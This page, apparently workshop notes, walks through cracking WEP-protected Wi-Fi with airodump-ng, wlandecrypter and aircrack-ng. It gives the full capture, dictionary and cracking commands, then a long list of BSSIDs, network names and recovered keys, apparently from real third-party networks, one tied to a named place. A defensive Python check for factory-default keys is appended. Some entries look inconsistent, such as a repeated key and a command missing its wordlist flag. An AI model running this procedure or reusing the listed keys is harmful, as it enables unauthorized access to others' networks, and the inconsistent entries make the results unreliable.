Aircrack
WEP key decryption workshop (Sergi Tur), Festa Ubuntu 9.04: Fitxer:TallerClausWEP.pdf
The aircrack-ng and airodump executables are in /usr/sbin (careful, because they are not listed). To move into this directory and list it:
# cd /usr/sbin
# ls -la
1) Airodump
sbin$ airodump-ng --help
options:
    --ivs              save only captured IVs
    --write <prefix>   -> dump file prefix
sbin$ airodump-ng --write hola eth3
If you want to save the file on the internal disk:
sbin$ airodump-ng --write mnt/sda2/hola eth3
(replace sda2 with the disk that applies)
The column that matters is #Data.
I pick the following one:
essid: WLAN_4E
bssid: 00:01:38:9A:C2:83
channel 6
WEP
I stop airodump (Ctrl-C) when I have 64 packets (to decrypt the WLAN_ networks, 5 should be enough). I have the files hola-01.cap and hola-01.txt in the same directory.
$ ls hola*
2) build the dictionary
sbin$ wlandecrypter --help
wlandecrypter <bssid> <essid> [output file]
wlandecrypter 00:01:38:9A:C2:83 WLAN_4E diccionari.txt
The file diccionari.txt has been generated.
$ ls diccionari.txt
$ cat diccionari.txt
3) aircrack
sbin$ aircrack-ng --help
options:
    -a 1         (force WEP attack)
    -b <bssid>   the MAC
    -e <essid>   the network name
sbin$ aircrack-ng -a 1 -b <mac> -e <essid> -w diccionari <fitxer.cap>
sbin$ aircrack-ng -a 1 -b 00:01:38:9A:C2:83 -e WLAN_4E -w diccionari.txt hola-01.cap
KEY FOUND!! 58:30:30:30:31:33:38:41:45:42:31:34:45
ASCII: X000138AEB14E
Others:

essid: WLAN_44
bssid: 00:60:B3:F3:D3:54
channel 9
WEP
wlandecrypter 00:60:B3:F3:D3:54 WLAN_44 diccionari.txt
aircrack-ng -a 1 -b 00:60:B3:F3:D3:54 -e WLAN_44 -w diccionari.txt hola2-01.cap
KEY FOUND!! 5A:30:30:31:33:34:39:35:45:36:34:34:34
ascii: Z0013495E6444

essid: WLAN76A516
bssid: 00:13:F7:97:6A:20
channel 2
WEP
wlandecrypter 00:13:F7:97:6A:20 WLAN76A516 diccionari.txt
aircrack-ng -a 1 -b 00:13:F7:97:6A:20 -e WLAN76A516 -w diccionari.txt hola2-01.cap

essid: WLAN_B0
bssid: 00:02:CF:65:BA:D6
channel 9
WEP
wlandecrypter 00:02:CF:65:BA:D6 WLAN_B0 diccionari.txt
aircrack-ng -a 1 -b 00:02:CF:65:BA:D6 -e WLAN_B0 -w diccionari.txt hola-01.cap
KEY FOUND!! 5A:30:30:30:32:43:46:36:38:37:31:42:30
ASCII: Z0002CF6871B0

essid: WLAN_C2
bssid: 00:01:38:B9:E5:3D
channel 9
WEP
wlandecrypter 00:01:38:B9:E5:3D WLAN_C2 diccionari.txt
aircrack-ng -a 1 -b 00:01:38:B9:E5:3D -e WLAN_C2 -w diccionari.txt hola-01.cap
KEY FOUND!! 58:30:30:30:31:33:38:42:41:38:45:43:32
ASCII: X000138BA8EC2

essid: WLAN_BC
bssid: 00:02:CF:55:B0:0D
channel 9
WEP
wlandecrypter 00:02:CF:55:B0:0D WLAN_BC diccionari.txt
aircrack-ng -a 1 -b 00:02:CF:55:B0:0D -e WLAN_BC -w diccionari.txt hola-01.cap
KEY FOUND! 5A:30:30:30:32:43:46:35:37:35:41:42:43
ASCII: Z0002CF575ABC

essid: WLAN_70 ASCII: Z0002CFC19070
essid: WLAN_5C ASCII: X000138C2245C
essid: WLAN_92 ASCII: Z0002CF6C9992
essid: WLAN_52 ASCII: X000138C67152
essid: WLAN_B2 ASCII: Z0002CFDA8DB2
essid: WLAN_9A ASCII: Z0013497A829A
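
As an added example (not part of the original page and not wlandecrypter's code), this Python check lets an owner audit whether a router's configured WEP key still has the factory-default layout visible in the WLAN_ results above: one letter, six hex digits, four more hex digits, then the two characters that follow WLAN_ in the ESSID. The function names, the layout itself (inferred only from the keys listed here) and the sample values are assumptions.

```python
import re

# Layout inferred from the keys listed on this page (an assumption, not vendor
# documentation): 1 letter + 6 hex digits + 4 hex digits + 2-char ESSID suffix.
DEFAULT_KEY = re.compile(r"^[A-Z][0-9A-F]{6}[0-9A-F]{4}([0-9A-F]{2})$")
DEFAULT_ESSID = re.compile(r"^WLAN_([0-9A-F]{2})$")


def decode_key(key: str) -> str:
    """Accept 'X00...' ASCII, '58:30:...' or '5830...' hex; return ASCII text."""
    compact = key.replace(":", "").strip()
    if re.fullmatch(r"[0-9A-Fa-f]{26}", compact):  # 13 bytes = 104-bit WEP key
        return bytes.fromhex(compact).decode("ascii", errors="replace")
    return key.strip()


def audit_wep_key(essid: str, key: str) -> dict:
    """Report whether a configured key still looks like the factory default."""
    text = decode_key(key)
    m_key, m_essid = DEFAULT_KEY.match(text), DEFAULT_ESSID.match(essid)
    looks_default = bool(m_key and m_essid and m_key.group(1) == m_essid.group(1))
    return {
        "essid": essid,
        "looks_default": looks_default,
        # The ESSID gives away the last two characters, so for a given
        # letter-plus-six-digit prefix only four hex digits are left to vary.
        "variable_hex_digits": 4 if looks_default else None,
        "advice": ("factory-default key: change it and move to WPA2/WPA3"
                   if looks_default
                   else "not the default layout, but WEP itself remains weak"),
    }


if __name__ == "__main__":
    # Constructed sample values, not taken from any real network.
    samples = [
        ("WLAN_AB", "58:30:30:31:31:32:32:33:33:34:34:41:42"),
        ("WLAN_AB", "X0011223344CD"),
        ("HomeNet", "correcthorse1"),
    ]
    for essid, key in samples:
        print(audit_wep_key(essid, key))
```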
Bagà
essid: Germanes_Dominiques
bssid: 00:1E:2A:19:07:5A
channel 13
WEP
wlandecrypter 00:1E:2A:19:07:5A Germanes_Dominiques diccionari.txt
aircrack-ng -a 1 -b 00:1E:2A:19:07:5A -e Germanes_Dominiques hola-04.cap
KEY FOUND!! 5A:30:30:31:33:34:39:35:45:36:34:34:34
ascii: Z0013495E6444

essid: WLAN_EE
bssid: 00:02:CF:79:36:A0
channel 9
WEP
wlandecrypter 00:02:CF:79:36:A0 WLAN_EE diccionari.txt
aircrack-ng -a 1 -b 00:02:CF:79:36:A0 -e WLAN_EE -w diccionari.txt hola-08.cap
KEY FOUND!! [ 5A:30:30:30:32:43:46:37:38:43:43:45:45 ] (ASCII: Z0002CF78CCEE )

WLAN_28: 5A303030324346394230443238
Local
essid: WLAN_1F
bssid:
channel 2
WEP
KEY FOUND!! 5A:30:30:31:33:34:39:35:44:42:41:31:46
ascii: Z0013495DBA1F

essid: WLAN_00
bssid:
channel 2?
WEP
KEY FOUND!!
ascii: Z0002CF78D100

Viaplana
essid: Tele2 IX1V9417358
created by Joan Quintana Compte, April 2008